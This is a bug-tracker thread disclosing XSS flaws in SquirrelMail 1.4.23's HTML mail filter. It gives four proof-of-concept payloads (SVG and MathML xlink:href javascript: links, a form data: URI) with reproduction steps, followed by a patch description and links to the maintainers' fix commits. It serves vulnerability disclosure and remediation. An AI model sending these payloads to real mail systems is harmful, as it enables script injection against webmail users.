There are multiple XSS vulnerabilities in the mail message display page(functions/mime.php),the function magicHTML
can not filter some special tags.
The steps to reproduce are below:
PoC1 (triggered in Chrome,Firefox):
<svg><a xlink:href="javascript:alert(/XSS/)"><rect width="1000" height="1000" fill="white"/></a></svg>
PoC2 (triggered in Chrome,Firefox,safari):
<form action='data:text/html,<script>alert(/XSS/)</script>'><button></form>
PoC3 (triggered in Firefox):
<math><maction actiontype="" xlink:href="javascript:alert(/XSS/)"> Click here
PoC4 (triggered in Firefox):
<math xlink:href=javascript:alert(/XSS/)> Click here
Choose one of PoCs and send it to squirrelmail webmail system.
Log in to squirrelmail webmail system and view the mail received(HTML Version is opened)
Click the area in the content.The xss will be triggered
Version:
The testing squirrelmail webmail version is 1.4.23.Link is below:
http://squirrelmail.org/download.php
php:5.3.17
apache:2.2.12
I created a patch that fixes all those issues and a few more.
Appart from the ones you mentioned it is also possible to achieve XSS via the formaction attribute or via svg animations (animate to attribute).
I'm now adding a lot more filtering, but I believe this doesn't break any common html mails, as other webmailers apply similar filtering. I'm completely removing inline SVG (gmail does the same, so I don't think anyone uses them). Some of the filtering is now redundant, but it may help kill further variations.
Particularly:
- Completely remove inline svg and content
- Remove animate, form, math, param tags
- URL-filter xlink:href, action, formaction, to
This is all far from ideal, but it fixes everything I can think of. Better would be a whitelist approach or using a library like htmlpurifier.
For proper credits: Sebastian Lekies was incredibly helpful in teaching me about all kinds of XSS vectors I wasn't aware of.
Last edit: Hanno Böck 2018-07-17
Thank you for this report. However, this bug tracker is not the place for disclosure of security vulnerabilities. Please refer to https://squirrelmail.org/security for information on how to report such issues directly to the SquirrelMail team so that we can analyze it and patch it with you before releasing it responsibly to the community.
The following patches should close all isues you've found:
1.4.23:
https://sourceforge.net/p/squirrelmail/code/14804
https://sourceforge.net/p/squirrelmail/code/14806
1.5.2:
https://sourceforge.net/p/squirrelmail/code/14805
https://sourceforge.net/p/squirrelmail/code/14807